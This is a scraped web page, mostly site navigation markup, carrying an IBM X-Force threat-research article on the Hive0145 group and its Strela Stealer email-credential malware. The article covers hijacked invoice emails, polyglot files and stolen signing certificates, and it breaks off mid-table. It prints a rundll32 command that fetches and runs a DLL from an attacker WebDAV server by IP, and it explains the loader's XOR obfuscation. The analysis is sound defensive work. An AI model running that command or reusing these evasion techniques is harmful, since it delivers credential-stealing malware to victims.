class="navigation__button " data-menu="megamenu__news">News</button> <button type="button" class="navigation__button " data-menu="megamenu__topics" on="tap:megamenu__news.hide, megamenu__series.hide, megamenu__topics.show, megamenu__industries.hide, megamenu__threat.hide, megamenu__podcast.hide, megamenu__events.hide, megamenu__mask.show" role="link" tabindex="0">Topics</button> <button type="button" class="navigation__button " data-menu="megamenu__threat" on="tap:megamenu__news.hide, megamenu__series.hide, megamenu__topics.hide, megamenu__industries.hide, megamenu__threat.show, megamenu__podcast.hide, megamenu__events.hide, megamenu__mask.show" role="link" tabindex="0">Threat Research</button> <button type="button" class="navigation__button " data-menu="megamenu__podcast" on="tap:megamenu__news.hide, megamenu__series.hide, megamenu__topics.hide, megamenu__industries.hide, megamenu__threat.hide, megamenu__podcast.show, megamenu__events.hide, megamenu__mask.show" role="link" tabindex="0">Podcast</button> <button type="button" aria-labelledby="search-tablet" class="navigation__search" onclick="document.getElementById('search__input').focus()" on="tap:search.toggleClass(class='megamenu__open')" role="link" tabindex="0"> <amp-img width="24" height="24" layout="responsive" src="https://securityintelligence.com/wp-content/themes/sapphire/images/search.svg" alt="Search"></amp-img> </button> </div> <!-- SEARCH --> <form id="search" class="search " method="GET" action="/" target="_top" tabindex="-1"> <amp-autocomplete filter="prefix" src="https://securityintelligence.com/wp-content/themes/sapphire/app/jsons/suggestions.json" suggest-first submit-on-enter on="select:search.submit" tabindex="-1"> <input id="search__input" tabindex="-1" type="text" name="s" autocomplete="on" placeholder="What would you like to search for?" aria-label="Search" oninput="validateInput(this)" required> </amp-autocomplete> <button tabindex="-1" value="submit" type="submit" class="search__submit" aria-label="Click to search"> <amp-img width="20" height="20" layout="responsive" src="https://securityintelligence.com/wp-content/themes/sapphire/images/search.svg" alt="Search"></amp-img> <span>Search</span> </button> <button tabindex="-1" value="reset" class="search__close" type="reset" aria-labelledby="search" on="tap:search.toggleClass(class='megamenu__open')" role="link"> <amp-img width="14" height="14" layout="responsive" src="https://securityintelligence.com/wp-content/themes/sapphire/images/close.svg" alt="Close"></amp-img> </button> </form> <!-- MEGAMENU --> <div id="navigation__mega"> <!-- NEWS --> <section id="megamenu__news" class="megamenu" data-menu="nav-news" on="tap:megamenu__news.show, megamenu__mask.show" role="link" tabindex="0"> <amp-list layout="responsive" width="1440" height="248" credentials="include" src="https://securityintelligence.com/wp-content/themes/sapphire/app/jsons/posts.php?quantity=4&type=ibm_news" binding="no"> <template type="amp-mustache"> <div class="row"> <!-- ARTICLES --> {{#articles}} <article class="megamenu__article"> <a href="{{permalink}}" class="megamenu__link"> <div class="megamenu__image"> <amp-img width="630" height="330" layout="responsive" src="{{image}}" alt="{{image_alt}}"></amp-img> </div> <h3 class="megamenu__title">{{title}}</h3> </a> </article> {{/articles}} <!-- VIEW MORE --> <a href="/news/" class="megamenu__more"> <amp-img width="24" height="24" layout="responsive" src="https://securityintelligence.com/wp-content/themes/sapphire/images/post-type-icons/news.svg" alt="News"></amp-img> <span>View All News</span> </a> </div> </template> </amp-list> </section> <!-- SERIES --> <!-- TOPICS --> <section id="megamenu__topics" class="megamenu" data-menu="nav-topics" on="tap: megamenu__topics.show, megamenu__mask.show" role="link" tabindex="0"> <div class="row"> <!-- LISTS --> <div class="megamenu__list"> <a href="/category/app-security/">Application Security</a> <a href="/category/artificial-intelligence/">Artificial Intelligence</a> <a href="/category/ciso-corner/">CISO</a> <a href="/category/cloud-protection/">Cloud Security</a> <a href="/category/data-protection/">Data Protection</a> <a href="/category/endpoint/">Endpoint</a> </div> <div class="megamenu__list"> <a href="/category/fraud-protection/">Fraud Protection</a> <a href="/category/identity-access/">Identity & Access</a> <a href="/category/incident-response/">Incident Response</a> <a href="/category/mainframe/">Mainframe</a> <a href="/category/network/">Network</a> <a href="/category/risk-management/">Risk Management</a> </div> <div class="megamenu__list"> <a href="/category/security-intelligence-analytics/">Intelligence & Analytics</a> <a href="/category/security-services/">Security Services</a> <a href="/category/threat-hunting/">Threat Hunting</a> <a href="/category/topics/zero-trust/">Zero Trust</a> <a href="/infographic-zero-trust-policy/">Infographic: Zero trust policy</a> <a href="/timeline/state-local-government-cyberattacks/">Timeline: Local Government Cyberattacks</a> </div> <div class="megamenu__list"> <span>Industries</span> <a href="/category/banking-financial-services-industry/">Banking & Finance</a> <a href="/category/energy-utility-industry/">Energy & Utility</a> <a href="/category/government/">Government</a> <a href="/category/health-care-industry/">Healthcare</a> </div> <!-- VIEW MORE --> <a href="/category/topics/" class="megamenu__more"> <amp-img width="24" height="24" layout="responsive" src="https://securityintelligence.com/wp-content/themes/sapphire/images/post-type-icons/topics.svg" alt="Topics"></amp-img> <span>View All Topics</span> </a> </div> </section> <!-- THREAT RESEARCH --> <section id="megamenu__threat" class="megamenu" data-menu="nav-x-force" on="tap:megamenu__threat.show, megamenu__mask.show" role="link" tabindex="0"> <amp-list layout="responsive" width="1440" height="248" credentials="include" src="https://securityintelligence.com/wp-content/themes/sapphire/app/jsons/posts.php?quantity=4&category=x-force" binding="no"> <template type="amp-mustache"> <div class="row"> <!-- ARTICLES --> {{#articles}} <article class="megamenu__article"> <a href="{{permalink}}" class="megamenu__link"> <div class="megamenu__image"> <amp-img width="630" height="330" layout="responsive" src="{{image}}" alt="{{image_alt}}"></amp-img> </div> <h3 class="megamenu__title">{{title}}</h3> </a> </article> {{/articles}} <!-- VIEW MORE --> <a href="/x-force/" class="megamenu__more"> <amp-img width="24" height="24" layout="responsive" src="https://securityintelligence.com/wp-content/themes/sapphire/images/post-type-icons/threat-research.svg" alt="Threat Research"></amp-img> <span>View More From X-Force</span> </a> </div> </template> </amp-list> </section> <!-- PODCAST --> <section id="megamenu__podcast" class="megamenu" data-menu="nav-media" on="tap:megamenu__podcast.show, megamenu__mask.show" role="link" tabindex="0"> <amp-list layout="responsive" width="1440" height="248" credentials="include" src="https://securityintelligence.com/wp-content/themes/sapphire/app/jsons/posts.php?quantity=4&type=ibm_media" binding="no"> <template type="amp-mustache"> <div class="row"> <!-- ARTICLES --> {{#articles}} <article class="megamenu__article"> <a href="{{permalink}}" class="megamenu__link"> <div class="megamenu__image"> <amp-img width="630" height="330" layout="responsive" src="{{image}}" alt="{{image_alt}}"></amp-img> </div> <h3 class="megamenu__title">{{title}}</h3> </a> </article> {{/articles}} <!-- VIEW MORE --> <a href="/media/" class="megamenu__more"> <amp-img width="24" height="24" layout="responsive" src="https://securityintelligence.com/wp-content/themes/sapphire/images/post-type-icons/podcast.svg" alt="Podcast"></amp-img> <span>View All Episodes</span> </a> </div> </template> </amp-list> </section> </div> <!-- MASK --> <div id="megamenu__mask" class="navigation__mask " hidden></div> <!-- MEGAMENU SCRIPTS --> <script type="text/javascript"> function validateInput(inputElement) { // Regular expression to allow only letters (both uppercase and lowercase) and numbers var regex = /^[A-Za-z0-9 ]*$/; // Get the current value of the input field var inputValue = inputElement.value; // Check if the input value matches the allowed pattern if (!regex.test(inputValue)) { // If the input contains special characters, remove them inputElement.value = inputValue.replace(/[^A-Za-z0-9 ]/g, ''); } } // DESKTOP MENU LINKS - HOVER ACTION var elementList = document.querySelectorAll('.navigation__menu .navigation__button'); for (i = 0; i < elementList.length; i++) { elementList[i].addEventListener('mouseenter', function() { if (localStorage['megamenu-status'] !== 'first-interaction') { var mega = document.getElementById("navigation__mega"); var menu_elements = document.getElementById(this.dataset.menu); var mask = document.getElementById("megamenu__mask"); menu_elements.click(); mega.classList.add('amp-open'); menu_elements.classList.add('amp-open'); mask.classList.add('amp-open'); } }); elementList[i].addEventListener('mouseleave', function() { if (localStorage['megamenu-status'] !== 'first-interaction') { var mega = document.getElementById("navigation__mega"); var menu_elements = document.getElementById(this.dataset.menu); var mask = document.getElementById("megamenu__mask"); mega.classList.remove('amp-open'); menu_elements.classList.remove('amp-open'); mask.classList.remove('amp-open'); } }); } // TABLET MENU LINKS - CLICK ACTION var elementList = document.querySelectorAll('.navigation__menu--tablet .navigation__button'); for (i = 0; i < elementList.length; i++) { elementList[i].addEventListener('click', function() { var mega = document.getElementById("navigation__mega"); var menu_elements = document.getElementById(this.dataset.menu); var mask = document.getElementById("megamenu__mask"); menu_elements.click(); mega.classList.add('amp-open'); menu_elements.classList.add('amp-open'); mask.classList.add('amp-open'); }); } // OPPENED MEGAMENU - HOVER ACTION var elementList = document.querySelectorAll('.megamenu'); for (i = 0; i < elementList.length; i++) { elementList[i].addEventListener('mouseenter', function() { var mega = document.getElementById("navigation__mega"); var nav_elements = document.getElementById(this.dataset.menu); var mask = document.getElementById("megamenu__mask"); this.classList.add('amp-open'); mega.classList.add('amp-open'); mask.classList.add('amp-open'); nav_elements.classList.add('amp-open'); }); elementList[i].addEventListener('mouseleave', function() { var mega = document.getElementById("navigation__mega"); var nav_elements = document.getElementById(this.dataset.menu); var mask = document.getElementById("megamenu__mask"); this.classList.remove('amp-open'); mega.classList.remove('amp-open'); mask.classList.remove('amp-open'); nav_elements.classList.remove('amp-open'); }); } </script> <!-- MOBILE ICON --> <button type="button" aria-labelledby="search-tablet" class="search__mobile__icon" onclick="document.getElementById('search__input').focus()" on="tap:search.toggleClass(class='megamenu__open')" role="link" tabindex="0"> <amp-img width="18" height="18" layout="fixed" src="https://securityintelligence.com/wp-content/themes/sapphire/images/search.svg" alt="Search"></amp-img> </button> <div class="navigation__mobile-icon" on="tap:navigation__mobile.toggleVisibility, navigation__hamburguer.toggleVisibility, navigation__close.toggleVisibility " role="link" tabindex="0"> <amp-img id="navigation__hamburguer" width="24" height="24" layout="responsive" src="https://securityintelligence.com/wp-content/themes/sapphire/images/hamburguer.svg" alt="Menu"></amp-img> <amp-img id="navigation__close" width="24" height="24" layout="responsive" src="https://securityintelligence.com/wp-content/themes/sapphire/images/close.svg" alt="Close" hidden></amp-img> </div> <!-- MOBILE LIST --> <section id="navigation__mobile" class="navigation__mobile-list" hidden> <div class="container"> <a href="/news/">News</a> <!-- ACCORDIONS --> <amp-accordion disable-session-states> <!-- TOPICS --> <section class="navigation__accordion"> <h2>Topics</h2> <div class="navigation__accordion-content"> <div class="row"> <a href="/category/topics/">All Categories</a> <a href="/category/app-security/">Application Security</a> <a href="/category/identity-access/">Identity & Access</a> <a href="/category/artificial-intelligence/">Artificial Intelligence</a> <a href="/category/incident-response/">Incident Response</a> <a href="/category/ciso-corner/">CISO</a> <a href="/category/mainframe/">Mainframe</a> <a href="/category/cloud-protection/">Cloud Security</a> <a href="/category/mobile-security-podcasts/">Mobile Security</a> <a href="/category/data-protection/">Data Protection</a> <a href="/category/network/">Network</a> <a href="/category/endpoint/">Endpoint</a> <a href="/category/risk-management/">Risk Management</a> <a href="/category/fraud-protection/">Fraud Protection</a> <a href="/category/threat-hunting/">Threat Hunting</a> <a href="/category/security-services/">Security Services</a> <a href="/category/security-intelligence-analytics/">Security Intelligence & Analytics</a> </div> <div class="row"> <span>Industries</span> <a href="/category/industries/banking-financial-services-industry/">Banking & Finance</a> <a href="/category/energy-utility-industry/">Energy & Utility</a> <a href="/category/government/">Government</a> <a href="/category/health-care-industry/">Healthcare</a> </div> </div> </section> </amp-accordion> <a href="/x-force/">X-Force</a> <a href="/media/">Podcast</a> </section> </div> </div> </nav> <!-- BACK TO TOP --> <div class="scroll-to-top "> <!-- TOP VIEWER TRIGGER --> <div id="top-viewer" class="scroll-to-top__viewer"></div> <!-- BUTTON --> <div class="sticky" style="height: 100%;"> <button id="scrollToTopButton" on="tap:top-viewer.scrollTo(duration=200, position=bottom)" class="tap_target "> <div class="scroll-to-top__button"> <amp-img width="12" height="16" layout="fixed" alt="Back-to-top" src="https://securityintelligence.com/wp-content/themes/sapphire/images/scroll-to-top.svg"></amp-img> </div> </button> </div> <!-- SCROLL SHOW/HIDE ANIMATION --> <amp-animation id="showAnim" layout="nodisplay"> <script type="application/json"> { "duration": "200ms", "fill": "both", "iterations": "1", "direction": "alternate", "animations": [{ "selector": "#scrollToTopButton", "keyframes": [{ "opacity": "1", "visibility": "visible" }] }] } </script> </amp-animation> <amp-animation id="hideAnim" layout="nodisplay"> <script type="application/json"> { "duration": "200ms", "fill": "both", "iterations": "1", "direction": "alternate", "animations": [{ "selector": "#scrollToTopButton", "keyframes": [{ "opacity": "0", "visibility": "hidden" }] }] } </script> </amp-animation> </div> <!-- CHECK PAGE POSITION --> <amp-position-observer target="top-viewer" intersection-ratios="0" on="enter:hideAnim.start; exit:showAnim.start" layout="nodisplay"></amp-position-observer> <!-- SCHEMA --> <script id="post-schema" type="application/ld+json"> { "@context": "http://schema.org", "@type": "Article", "headline": "Strela Stealer: Today’s invoice is tomorrow’s phish", "mainEntityOfPage": "https://securityintelligence.com/x-force/strela-stealer-todays-invoice-tomorrows-phish/", "author": { "@type": "Person", "name": "Golo Mühr" }, "datePublished": "2024-11-12T06:00:00-05:00", "dateModified": "2024-11-14T18:28:12-05:00", "publisher": { "@type": "Organization", "name": "Security Intelligence", "logo":{ "@type": "ImageObject", "url": "https://securityintelligence.com/wp-content/themes/security-intelligence/assets/img/logo.png" } }, "image": [ "https://securityintelligence.com/wp-content/uploads/2024/11/Phishing.-financial-concept.-Digital-payments-630x330.jpeg" ], "articleBody": "As of November 2024, IBM X-Force has tracked ongoing Hive0145 campaigns delivering <i>Strela Stealer</i> malware to victims throughout Europe - primarily Spain, Germany and Ukraine. The phishing emails used in these campaigns are real invoice notifications, which have been stolen through previously exfiltrated email credentials. Strela Stealer is designed to extract user credentials stored in Microsoft Outlook and Mozilla Thunderbird. During the past 18 months, the group tested various techniques to enhance its operation's effectiveness. Hive0145 is likely to be a financially motivated initial access broker (IAB), active since late 2022 and potentially the sole operator of Strela Stealer. The continuous operational pace of Hive0145's campaigns highlights an increased risk to potential victims across Europe. <h2>Key Findings:</h2> <ul type="disc"> <li>Hive0145 is an initial access broker focused on targeting victims throughout Europe</li> <li>During the last 18 months, Strela Stealer has tested out a variety of techniques to improve its infection chain and extract email credentials</li> <li>As of July 2024, Hive0145 began using stolen emails to further spread Strela Stealer</li> <li>Hive0145 campaigns have increased in volume, with weekly campaigns as of 17 October 2024</li> <li>As of early November 2024, Hive0145 began targeting Ukraine with stolen invoice emails</li> <li>Hive0145 is potentially the sole operator of Strela Stealer</li> </ul> <h2>Background</h2> Starting mid-April 2023, X-Force began tracking an increase in Hive0145 activity. Hive0145 is likely a financially motivated initial access broker (IAB) and potentially the sole operator of Strela Stealer. Strela Stealer is a <a href="https://www.ibm.com/topics/malware" target="_blank" rel="noopener">malware</a> designed to extract user email credentials stored in Microsoft Outlook and Mozilla Thunderbird, potentially leading to Business Email Compromise (BEC). IABs routinely gather credentials and other data that is sold to affiliate <a href="https://www.ibm.com/topics/threat-actor" target="_blank" rel="noopener">threat actors</a> specializing in victim network exploitation. However, it remains unknown if Hive0145 has a specific partner network for selling the access gained through their campaigns. Over the past year, Hive0145 has demonstrated proficiency in evolving tactics, techniques and procedures (TTPs) to target victims across Europe. Italian, Spanish, German and Ukrainian victims continue to receive weaponized attachments that entice the victim to open the file. The actor's campaigns present the victim with fake invoices or receipts and often a short, generic message of urgency for victims to address. Upon loading the attached file, the victim unwittingly executes the infection chain leading to Strela Stealer malware. <strong><img src="https://images2.cmp.optimizely.com/Zz1iODZmNTg3OGEwN2ExMWVmYWNmNDY2OGUwNDMwMWU2OQ==" alt="fig 1-strela_santander.png" width="547.8264947245018" height="544" /></strong> <em>Figure 1 Banco Santander-themed email campaign</em> Hive0145 continued this pattern of using generic messages and fake invoices and receipts throughout the first half of 2024. However, by early July 2024, the group adopted a different approach and began weaponizing stolen emails of actual entities across financial, technology, manufacturing, media, e-commerce and other industries. The departure in simplicity indicates Hive0145's shift in a maturing cyber operations capability. <h2>Attachment hijacking</h2> In July 2024, X-Force observed a mid-campaign change in the emails being distributed by Hive0145, with the short and generic messages being replaced with what appeared to be legitimate stolen emails. The <a href="https://www.ibm.com/topics/phishing" target="_blank" rel="noopener">phishing</a> emails exactly matched official invoice communication emails and, in some cases, still directly addressed the original recipients by name. X-Force was able to verify that the emails were in fact authentic invoice notifications from a variety of entities across financial, technology, manufacturing, media, e-commerce and other industries. It is likely that the group sourced the emails through previously exfiltrated credentials from their prior campaigns. The concept of using stolen emails is not new, it was used extensively by the Emotet group and malware distributors such as Hive0118 (aka TA577), <a href="https://www.proofpoint.com/us/blog/security-briefs/ta551-uses-sliver-red-team-tool-new-activity">TA551</a> and <a href="https://www.proofpoint.com/sites/default/files/misc/pfpt-us-threat-research-2023-05-12-cybercrime-experimentation.pdf">TA570</a>. In their campaigns, they leveraged thread hijacking, where new threads to stolen emails were used as a way to increase the appearance of legitimacy. The modified emails were sent to corresponding contacts of previous victims, making the final email look like a reply to the stolen email, thereby hijacking the email thread. The text the distributors add to the emails is often short replies, urging victims to look at the included attachments or URLs. The technique employed by Hive0145 differs from thread-hijacking in that rather than adding a reply message to the stolen email, the original contents remain largely unmodified and only the attachment is switched to include a malicious payload using the original filename (without the original extension). Within the email body, Hive0145 also replaces both the local part and the domain of the original email sender with that of the new phishing victim to custom-tailor the email. The emails with hijacked attachments are then sent out in mass phishing campaigns. Hive0145 also appears to carefully consider the hijacked emails by only selecting ones referring to invoices and containing attachments. X-Force has observed the attachment hijacking technique since mid-2024 in campaigns targeting German, Spanish and Ukrainian speakers. <strong><img src="https://images1.cmp.optimizely.com/Zz1jYTBkYzQwMmEwN2ExMWVmYmM1YzI2ZmFmZTE3ZDc1MA==" alt="fig 2-image-2024-11-5_16-42-6.png" width="544" height="615.3951497860199" /></strong> <em>Figure 2 Example of original stolen email of a Deutsche Bahn invoice with hijacked attachment</em> <h2>Late 2024 campaign</h2> The July 2024 campaign began to reveal low volumes of email delivery throughout the week of 8 July. Hive0145 appeared to take a short break before returning with a larger campaign the week of 22 July, followed by a period of inactivity. Starting mid-October 2024, Hive0145 returned with a widespread attachment hijacking campaign targeting Spanish, German and Ukrainian victims. Unlike the brief July campaign, this one has continued sending out notable volumes of emails with the majority sent during weekdays. <img src="https://images1.cmp.optimizely.com/Zz1kNWYyZTYxY2EwN2ExMWVmYmM1YzI2ZmFmZTE3ZDc1MA==" alt="fig 3-image copy.png" width="672" height="112" /> <em>Figure 3 The ongoing late-October 2024 campaign</em> Emails stolen across financial, technology, manufacturing, media, e-commerce and other industries continue to be weaponized as of early November 2024, in one of the largest observed Hive0145 campaigns to date. In the ongoing campaign, the victim receives an archive containing a heavily obfuscated JavaScript file that downloads and executes a crypted Strela Stealer DLL. As of 7 November 2024, Hive0145 is including Ukrainian speakers in the ongoing campaign signaling a significant development compared to previously observed victimology. <strong><img src="https://images3.cmp.optimizely.com/Zz1mYWMzNGEyY2EwN2ExMWVmYTdmYTllMDI5N2MwOTY3Mg==" alt="fig 4-Screenshot 2024-11-11 at 08.59.58.png" width="544" height="616.068376068376" /></strong> <em>Figure 4 Example of the original stolen email of an invoice targeting Ukraine</em> Hive0145's increased volume of delivery using attachment hijacking with a steady supply of freshly stolen emails may suggest the group has adopted automation for harvesting, weaponizing, packaging and sending their phishing emails. The group continues to show a preference for widespread exploitation of Spanish, German and Ukrainian victims throughout Europe. <h2>Evolving techniques</h2> Hive0145 stands out among other malware distributors for their level of effort to adopt increasingly sophisticated methods of delivering Strela Stealer. The level of sophistication reflects on other successful mass distributors of malware such as Emotet, Pikabot and Qakbot, which often led to the deployment of <a href="https://www.ibm.com/topics/ransomware" target="_blank" rel="noopener">ransomware</a>. Below is a breakdown of notable techniques used by Hive0145 over time, with some being briefly tested and others fully adopted. <h3>Polyglots</h3> The first Strela Stealer campaigns observed by X-Force made use of polyglot files, as first reported in a <a href="https://medium.com/@DCSO_CyTec/shortandmalicious-strelastealer-aims-for-mail-credentials-a4c3e78c8abc">blog by DCSO (Deutsche Cyber-Sicherheitsorganisation)</a> in late 2022. These files have multiple valid formats and can be parsed by different applications. The same file could be rendered as both HTML to display a decoy invoice as well as be a valid DLL, implementing Strela Stealer. This is a rather uncommon technique for attempting to bypass security solutions. <h3>Signed binaries</h3> Multiple campaigns throughout 2023 made use of valid code signing certificates for the malicious Strela Stealer binaries. For example, campaigns targeting Spanish-speaking victims dating back to April 2023 contained payloads with a valid certificate signed by <b>Tecfinance Informatica E Projetos De Sistemas Ltda</b>, a software company in Brazil. <strong><img src="https://images4.cmp.optimizely.com/Zz0wZTc0Y2ViYWEwN2IxMWVmYWUxOTJhOGIzMTc4OTEwMw==" alt="fig 5-image.png" width="573" height="455" /></strong> <em>Figure 5 Brazilian company certificate used in 2023 campaigns</em> On 5 May 2024, X-Force took steps to inform relevant parties of the finding, and the certificate has since been revoked. Of note, a mid-2023 Italy-targeted campaign used a different certificate: <strong><img src="https://images1.cmp.optimizely.com/Zz0xYjA0NGNiZWEwN2IxMWVmOGEzYzJhYzI5NDg3NjE0MA==" alt="fig 6-Screenshot 2023-05-15 at 12.58.52.png" width="341" height="372" /></strong> <em>Figure 6 Another stolen certificate used in mid-2023 to target Italian victims</em> <h2>Targeted phishing</h2> Strela Stealer phishing campaigns also tailored filenames to include targeted domain names. The file names are often identical to the name of the organization or company, potentially in an attempt to generate authenticity. The example below is a phishing email from 2023 posing as an invoice or payment receipt. <img src="https://images3.cmp.optimizely.com/Zz0yOWJhYjYzMGEwN2IxMWVmYTVjZWU2NTBmNjQyY2Y2Ng==" alt="fig 7-strela_factura.png" width="547.8354876615747" height="544" /> <em>Figure 7 Factura-themed email campaign</em> As the email suggests, the attachments are encrypted ZIP files, with passwords slightly differing between every email. Threat actors encrypt email attachments since basic email filtering and sandbox solutions often cannot inspect or detonate those files. Strela Stealer has also used uncommon extensions for their PE executable files such as <b>.com</b> instead of <b>.exe</b>: <table class="ScrollCode" style="border: 1pt dashed #6199c9; width: 88.5174%;" border="1" cellspacing="0" cellpadding="0"> <tbody> <tr> <td style="width: 100%; border: none; padding: 8.65pt 5pt 12.95pt 2.9pt;" valign="top"> <div style="border: none; border-left: none windowtext 1.0pt; padding: 0in 0in 0in 12.0pt; margin-left: 12.0pt; margin-right: 0in;"> <p style="margin: 0in; line-height: 107%; break-after: avoid; border: none; padding: 0in; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: black;"><span style="font-size: 9.0pt; line-height: 107%; font-family: 'Courier New';">transferencia_<domain_name>.com</span></span></p> <p style="margin: 0in; line-height: 107%; break-after: avoid; border: none; padding: 0in; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: black;"><span style="font-size: 9.0pt; line-height: 107%; font-family: 'Courier New';">factura_<domain_name>.com</span></span></p> <p style="margin: 0in; line-height: 107%; break-after: avoid; border: none; padding: 0in; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: black;"><span style="font-size: 9.0pt; line-height: 107%; font-family: 'Courier New';">FATTURA_<domain_name>.bat.exe</span></span></p> </div></td> </tr> </tbody> </table> This makes use of a condition in Microsoft Windows operating systems where three different extensions can be used to mark a file as executable: <b>.exe, .com, </b>and<b> .pif.</b> If the content is an executable PE file, Microsoft Windows will run it automatically once opened. By using the more uncommon and unknown extensions, the campaign may evade simple anti-virus solutions or victim suspicion. Earlier campaigns with the same payloads were also observed to make use of the <b>.pif</b> extension. <h2>Packing, obfuscation and crypting</h2> Apart from directly attached ZIP archives with the malicious executables, Strela Stealer campaigns also often use obfuscated scripts such as Batch, JavaScript or PowerShell to download or drop their payload. Campaigns throughout 2024 mainly relied on these obfuscated scripts to run a PowerShell command to connect to a WebDAV server and download and execute a crypted DLL: <table class="ScrollCode" style="border: dashed #6199C9 1.0pt;" border="1" cellspacing="0" cellpadding="0"> <tbody> <tr> <td style="width: 447.3pt; border: none; padding: 8.65pt 5.0pt 12.95pt 2.9pt;" valign="top"> <div style="border: none; border-left: none windowtext 1.0pt; padding: 0in 0in 0in 12.0pt; margin-left: 12.0pt; margin-right: 0in;"> <p style="margin: 0in; line-height: 107%; break-after: avoid; border: none; padding: 0in; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: #003366;"><span style="font-size: 9.0pt; line-height: 107%; font-family: 'Courier New';">"C:\Windows\system32\rundll32.exe"</span></span><span style="color: black;"><span style="font-size: 9.0pt; line-height: 107%; font-family: 'Courier New';"> \\</span></span><span style="color: #009900;"><span style="font-size: 9.0pt; line-height: 107%; font-family: 'Courier New';">94.159</span></span><span style="color: black;"><span style="font-size: 9.0pt; line-height: 107%; font-family: 'Courier New';">.</span></span><span style="color: #009900;"><span style="font-size: 9.0pt; line-height: 107%; font-family: 'Courier New';">113.48</span></span><span style="color: gray;"><span style="font-size: 9.0pt; line-height: 107%; font-family: 'Courier New';">@8888</span></span><span style="color: black;"><span style="font-size: 9.0pt; line-height: 107%; font-family: 'Courier New';">\davwwwroot\</span></span><span style="color: #009900;"><span style="font-size: 9.0pt; line-height: 107%; font-family: 'Courier New';">157161090119030</span></span><span style="color: black;"><span style="font-size: 9.0pt; line-height: 107%; font-family: 'Courier New';">.dll,Entry</span></span></p> </div></td> </tr> </tbody> </table> The WebDAV staging servers host a large number of DLLs, with different names and hashes. They appear to have been built using a crypter X-Force identifies as "Stellar Crypter," which has likely been in use exclusively by Hive0145 since at least May 2023. The malicious binaries identified as "Stellar Loader" contain the encrypted Strela Stealer payload. <h2>Stellar Loader</h2> Stellar Loader is a crypter that has been in use since at least April 2023 and is predominantly a precursor to follow on Strela Stealer payloads. Stellar samples are usually highly obfuscated and make use of techniques such as control flow obfuscation and include large amounts of junk instructions to hinder analysis and signature creation. Stellar's payload is XOR encrypted and stored in the .data section of the Stellar loader binary. The encrypted payload data is preceded by the XOR key which, in recent samples, consists solely of upper and lowercase letters and can be thousands of characters long. Upon execution, Stellar Loader decrypts the payload data using XOR and the stored key. The decryption process may also involve an additional round of XOR using a hardcoded single-byte key. As part of the Stellar Loader code's obfuscation, the decryption algorithm within the code is often expanded to include hundreds of operations. However, the vast majority of these operations cancel each other out, and what appears as a complex algorithm can be reduced down to a simple XOR operation. The screenshot below shows a version of Stellar Loader with minimal obfuscation, where the structure of the loader code and decryption algorithm can be easily seen. <img src="https://images4.cmp.optimizely.com/Zz0zZDg2NjY1MGEwN2IxMWVmYWUxOTJhOGIzMTc4OTEwMw==" alt="fig 8-241105-stellar-loader-code.PNG" width="675" height="632" /> In more recent versions of the loader, the encrypted payload data is followed by an additional encrypted block containing a list of API names required by the loader code, such as VirtualAlloc. The loader decrypts this block using the same key as the payload but without the additional single-byte XOR. The loader can then use the API names in the block to retrieve the corresponding API addresses. <img src="https://images1.cmp.optimizely.com/Zz02YTFlOTUwY2EwN2IxMWVmYmRiNDI2ZmFmZTE3ZDc1MA==" alt="fig 9-241105-stellar-decrypted-apis.PNG" width="593" height="128" /> Once the payload and API list have been decrypted, Stellar allocates space in memory using VirtualAlloc and maps the payload PE at the allocated address. It then performs the standard PE loading steps, such as loading its imports and processing any relocation sections (.relocs), and finally, it executes the payload at its entry point address. <h2>Strela Stealer</h2> Strela Stealer changed little in functionality over the past two years. Starting with the initial version reported on by <a href="https://medium.com/@DCSO_CyTec/shortandmalicious-strelastealer-aims-for-mail-credentials-a4c3e78c8abc">DCSO</a> in late 2022, the main objective of the stealer is to exfiltrate email credentials from two common email clients: Microsoft Outlook and Thunderbird. This is consistent across all variants, however, the latest variant does support more registry keys to search for Microsoft Outlook credentials than prior versions. Strela Stealer runs two functions tasked with stealing credentials from two email clients: <table class="ScrollTableNormal" style="width: 1067px; border-collapse: collapse; border: none;" border="1" cellspacing="0" cellpadding="0"> <thead> <tr> <td style="width: 55.4453px; border: 1pt solid #dddddd; background: #f0f0f0; padding: 1.5pt 1.5pt 1pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><b><span style="color: black;">Email client</span></b></p> </td> <td style="width: 301.875px; border-top: 1pt solid #dddddd; border-right: 1pt solid #dddddd; border-bottom: 1pt solid #dddddd; border-image: initial; border-left: none; background: #f0f0f0; padding: 1.5pt 1.5pt 1pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><b><span style="color: black;">Thunderbird</span></b></p> </td> <td style="width: 693.43px; border-top: 1pt solid #dddddd; border-right: 1pt solid #dddddd; border-bottom: 1pt solid #dddddd; border-image: initial; border-left: none; background: #f0f0f0; padding: 1.5pt 1.5pt 1pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><b><span style="color: black;">Microsoft Outlook</span></b></p> </td> </tr> </thead> <tbody> <tr> <td style="width: 55.4453px; border-right: 1pt solid #dddddd; border-bottom: 1pt solid #dddddd; border-left: 1pt solid #dddddd; border-image: initial; border-top: none; background: #f4f5f7; padding: 1.5pt 1.5pt 1pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: black;">Location</span></p> </td> <td style="width: 301.875px; border-top: none; border-left: none; border-bottom: 1pt solid #dddddd; border-right: 1pt solid #dddddd; padding: 1.5pt 1.5pt 1pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">File system</p> </td> <td style="width: 693.43px; border-top: none; border-left: none; border-bottom: 1pt solid #dddddd; border-right: 1pt solid #dddddd; padding: 1.5pt 1.5pt 1pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">Registry</p> </td> </tr> <tr> <td style="width: 55.4453px; border-right: 1pt solid #dddddd; border-bottom: 1pt solid #dddddd; border-left: 1pt solid #dddddd; border-image: initial; border-top: none; background: #f4f5f7; padding: 1.5pt 1.5pt 1pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: black;">Path</span></p> </td> <td style="width: 301.875px; 